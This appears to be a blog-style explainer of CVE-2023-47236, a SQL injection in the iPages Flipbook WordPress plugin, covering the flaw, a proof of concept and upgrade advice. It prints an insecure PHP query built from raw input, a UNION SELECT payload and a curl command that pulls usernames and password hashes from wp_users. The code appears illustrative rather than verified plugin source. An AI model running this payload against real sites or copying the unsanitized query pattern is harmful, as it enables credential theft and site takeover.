CVE-2023-47236 - SQL Injection in Avirtum iPages Flipbook For WordPress (<= 1.4.8) Explained

In late 2023, security researchers uncovered a critical vulnerability—CVE-2023-47236—affecting the iPages Flipbook For WordPress plugin by Avirtum. This plugin transforms PDFs and images into interactive flipbooks on WordPress sites, attracting thousands of installations. However, versions up to 1.4.8 have a SQL Injection flaw, putting site data and user privacy at risk.

This article will walk you through the vulnerability, how it works, proof of concept (PoC) code, exploitation details, and how to protect your WordPress site.

What is SQL Injection (SQLi)?

SQL Injection happens when an application mishandles user input in SQL queries, letting attackers inject malicious code. This can cause data leaks, website defacements, or even total server compromise.

Vulnerable versions: All up to and including 1.4.8

- Official Plugin Page: WordPress.org - iPages Flipbook
- Vulnerability Reference: GitHub Advisory Database

The Vulnerability: Where Did Devs Go Wrong?

The problem lies with improper neutralization of special characters in SQL commands. The plugin accepts user input in parameters (like GET or POST data) but fails to correctly escape or sanitize these inputs before building SQL queries.

Suppose your website URL has

/wp-admin/admin-ajax.php?action=ipages_flipbook_action&id=1

Inside the plugin code, you’d find statements like

$id = $_GET['id'];
$query = "SELECT * FROM flipbooks WHERE id = $id";
$result = $wpdb->get_results($query);

Here, $id comes directly from user input and is inserted into the SQL command without any sanitization or prepared statements.

Exploit Details & Proof of Concept

Because of this flaw, an attacker can craft malicious URLs (or POST data) to execute arbitrary SQL commands.

Malicious Request

GET /wp-admin/admin-ajax.php?action=ipages_flipbook_action&id=1 UNION SELECT 1,user_login,user_pass,4 FROM wp_users --

`

* The database responds with WordPress usernames and password hashes in the plugin’s response—sometimes in the HTML or JSON output!

You could exploit this using CURL or Burp Suite. Here’s a simple CURL command

curl "https://victim.com/wp-admin/admin-ajax.php?action=ipages_flipbook_action&id=1 UNION SELECT 1,user_login,user_pass,4 FROM wp_users --"

If the vulnerable code outputs the database response, you will see user logins and password hashes.

Vulnerability discovered: Late 2023

- Publicly disclosed: NVD: CVE-2023-47236

User credential theft (including admin accounts)

- Database compromise (read/write/modify data)

Full site takeover

WordPress sites running vulnerable versions are at great risk, especially those using default database prefixes (like wp_).


## How to Fix / Mitigation

- Upgrade to the latest version: iPages Flipbook For WordPress 1.4.9 or newer
- Use Web Application Firewalls: Plugins like Wordfence can help block malicious requests.

Sanitize user input: Always validate and sanitize inputs in any plugin or theme development.

- Check for signs of compromise: Look for unknown admin users, suspicious behavior, or unexpected plugin outputs.

References

- CVE-2023-47236 at NVD
- GitHub Advisory Database: GHSA-4x43-hxw6-h8qf
- WordPress Plugin Directory: iPages Flipbook

Conclusion

CVE-2023-47236 is a serious, easy-to-exploit SQL Injection flaw in a popular WordPress plugin. Site owners must update the iPages Flipbook For WordPress plugin to at least version 1.4.9, and stay vigilant for future vulnerabilities. Developers: always sanitize user input and use prepared statements!

Stay secure! If you run WordPress, always subscribe to vulnerability feeds and update plugins promptly to protect your site and users.

Timeline

Published on: 12/20/2023 14:15:20 UTC
Last modified on: 12/28/2023 20:07:16 UTC